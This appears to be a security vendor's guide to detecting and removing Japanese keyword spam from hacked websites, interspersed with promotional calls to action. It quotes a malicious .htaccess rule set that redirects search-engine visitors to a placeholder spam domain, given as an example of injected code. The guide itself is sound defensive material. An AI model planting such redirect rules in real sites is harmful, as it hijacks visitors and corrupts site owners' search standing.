How to Remove Japanese SEO Spam?

The website is a crucial aspect for any modern business operation. It is a great source of revenue for the company. Thus it becomes necessary for businesses to increase their online presence. High site ranks on the search engines contribute to an increase in user traffic. At times the users do not pay heed towards the site security. As a result, certain security lapses remain. This could lead to certain attacks on the infrastructure, like the infamous Japanese SEO spam. It leads to your site’s Google search results hacked. Also referred to as the Japanese Keyword hack, it can also result in your site getting blacklisted by search engines. Consequently, user traffic plunges. According to the book The Art of SEO,

What makes this(Spam) more complex is that you might link to a perfectly good domain that goes out of business. Whoever picks up the domain next might not be someone you want to link to, but you may not know that the site you originally linked to is gone and has been replaced by a spam site.

What can Japanese SEO Spam Do?

Japanese SEO Spam can have devastating effects on a site. However, it is often difficult to detect due to cloaking. Japanese Keyword hack can lead to the following issues:

  • Website loose reputation. Users no more trust the site with content.
  • Your site gets blacklisted by search engines. Thus all the user traffic plunges to almost nil.
  • The site becomes a platform to generate clicks and revenue for spammers.
  • Search rankings go down. This can harm businesses in the long run.
  • Chokes down your site bandwidth with unwanted traffic for a short span.

Infected with Japanese SEO Spam? Drop us a message on the chat widget and we’d be happy to help you. Fix my website results now.

Japanese SEO Spam: Evading Detection

Keyword Cloaking

Often it was observed that attackers used clever techniques for keyword cloaking. Keyword cloaking is a technique in which the spam words are hidden in the code. Which makes it difficult for the human eye to detect. However, the search engines pick up them. For instance, the spam keywords could be hidden in:

  • The CSS code or certain other elements.
  • Attackers often try to change spam word color. The color matches that of background. So, this makes it almost invisible to the human eye. However, search engines can pick up those words.
  • At times the spam keywords are of the really small font size. Rendering it unreadable to humans.
  • Spam keywords may be hidden in the headers and footers.

Spam Keyword Stuffing

Keyword stuffing is basically adding unnecessary keywords to the site. Although, these techniques are mostly outdated now. Thanks to the intelligent search engine algorithms. It was done to increase the site ranking in a particular keyword. In the earlier days of the internet, keyword stuffing was prevalent. Though, some old spammers still use these techniques. Keyword stuffing was done at places like:

  • Within the Alt attributes of images.
  • In the meta description of the site.
  • Inside the meta keywords.
  • Within the NoScript tags, NoEmbed tags.

Though, Google has tweaked its search algorithms. And it so does from time to time. Thus making such techniques obsolete. However, spammers also evolve their methods to evade detection to conduct Japanese SEO spam. As can be seen with the more sophisticated Japanese SEO spam.

SEO Cloaking

SEO Cloaking means serving different content based on user agent. Cloaking is usually not a good idea. As at times, spammers show normal pages to Googlebot but when users visit, those pages are selling adult products. This challenges the credibility of Google. Thus Google has strict classifications for cloaking. At times the spam page may show an error 404 page not found. However, Google still blacklists you for spam content. That is most likely the case of cloaking. To check for cloaking, fetch the page as a Googlebot.

However, there are some situations where cloaking can be okay. For instance, serving pages in different languages based on IP geolocation. Or certain other features which can make the site user-friendly. For instance, serving customized content for mobile devices. Cloaking is what Japanese SEO hack uses to hide from the site admin. So, in general, it is advised to avoid cloaking!

Japanese SEO Spam: Detection

Finding Spam Pages

Japanese keyword hack can result in some strange web pages appearing on site. Pages that were not a part of core installation. Detecting this kind of spam can be difficult at times. Mostly due to cloaking. The pages might not be directly visible to you. So, to look out for Japanese SEO spam infection, search for:

site:[your site root URL] japan

This simple search will list all the pages on your site with Japanese characters. Google classifies the pages accordingly. So this simple search can reveal all Japanese SEO spam pages. From here on you can move on to investigate the cause of the gibberish hack. Also, if the page is not found, it may be due to cloaking. In that scenario proceed to fetch the page as a Googlebot.

Japanese SEO Spam

Using Google Webmaster Tools

The first thing after getting infected by spam is to be blacklisted. Search engine crawlers crawl the internet regularly. So as soon the site is hit with a spam, it is blacklisted. This leads to a warning message in the meta-description. In some serious scenarios, users are warned from proceeding further in site. The first step would be to go to Google Security Issues Tool.

Japanese Keyword Hack

As seen in the image, Google will give you the reason for being blacklisted. The image above lists a spam infection as the cause of blacklist. Moreover, it gives a comprehensive list of multiple infected URLs. Work on cleaning the Japanese SEO spam infection first. Afterward, submit the site for a review.

Need professional help in removing Japanese Keyword Hack? Drop us a message on the chat widget and we’d be happy to help you. Fix my website results now.

Japanese SEO Spam: Causes

Common Vulnerabilities

Most likely, the spam injection could be due to one of the OWASP top 10 vulnerabilities. SQLi and XSS are quite common due to poor coding standards. The attackers would first compromise the database using an SQLi. From there on spam pages would be injected in the site. Thus conducting a Japanese SEO spam. Moreover, the attacker may exploit an XSS vulnerability to conduct phishing attacks. Often at times, it could be other common security issues. So basically look out for all of the Owasp top 10!

Misconfigured Server

Sometimes, poor hosting can cause you heavy money. There is a lot that can go wrong with a poorly managed server. Some of the causes for Japanese SEO spam due to mismanaged servers are:

  • Weak credentials vulnerable to brute force attacks.
  • Unfiltered ports open on the internet.
  • Unmanaged sub-domains.
  • Outdated installations.
  • Misconfigured DNS server.
  • No Subnetting which causes infection to spread on all sites sharing the same space.

Files Hacked

The .htaccess file is a very powerful file of the core installation. Apart from numerous other things, it is used for creating redirects. Attackers exploit this feature to serve spam. For instance look at the malicious code given below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://SpamDomain.tld/SPAM.php?t=3 [R,L]

The code in the last line redirects the users. They are then redirected to theSpamDomain.tld. After that, the page loads thespam.php script. This usually contains the gibberish hack contents of Japanese SEO spam.

Japanese SEO Spam: Fixes

Cleanup

Firstly look for files modified within the last few days. This would help to identify the files infected. Login via SSH and run the following command:

find /path-of-www -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r

This command would search for modified files based on the given time string. However, it is noteworthy here that some files are dynamic. That means their content changes regularly. So simply do not jump onto replacing them. The best thing from here on would be a code analysis for spam. It could be manual or automatic. As long as you are not a security expert, there are amazing security solutions available for this. These solutions can identify and patch the files automatically. However if you wish to manually inspect for Japanese SEO spam, look out for spam domains.

Replace the files containing gibberish hack with a backup. If the backup is not available then replace with fresh files. Although, it is advised to always keep a backup. Moreover login to your Dashboard and look for new users. If there are any suspicious users remove them. Reset your password to a strong one afterward. A weak password is one of the major cause of Japanese SEO hack!

Your website showing gibberish hack? Drop us a message on the chat widget and we’d be happy to help you. Fix Japanese SEO Spam results of my website now.

Review

Secondly, after cleanup its time to submit for review. This is the only way to remove your website from Google’s blacklist. However, make sure the infection is cleaned first as it can take days to review. When all is set, submit your site for a malware review. To submit  your site for a review:

  1. Click on the Security Issues Tab.
  2. Now check the button with, I have fixed these issues.
  3. Then, to request a rechecking of the site, click on the option Request a Review.
  4. Make sure to give a detailed info about the steps taken to clean the infection.
  5. After all, this is complete, click the Manual Actions section.
  6. However, at times there may be multiple issues. In that case, continue to follow steps 1-4 until everything is resolved.

Update

The cheapest and easiest way to stay secure from Japanese keyword hack is to update. Security issues are discovered very frequently. So, the best form of defense from the gibberish hack is to keep your installation up to date!

Firewall

The best protection against the Japanese SEO spam is a firewall. A Firewall conducts the stateful inspection. Each packet is individually monitored to check for exploits. Any hacking attempts are blocked. Moreover, some other security solutions like Astra even patch installations automatically. Also, the Astra firewall monitors your reputations from multiple search engines daily. So as soon the site is blacklisted, you can remove spam before user traffic drops zero. Astra firewall comes at affordable prices and a great customer support. With Astra, time to say bye to Japanese SEO spam forever!

At Astra, we take full responsibility for your website security and make sure that your website is free from all cyber attacks like SQLi, LFI, RFI, XSS, Bad Bots, and 100+ security threats. Secure your website now with Astra Security Suite.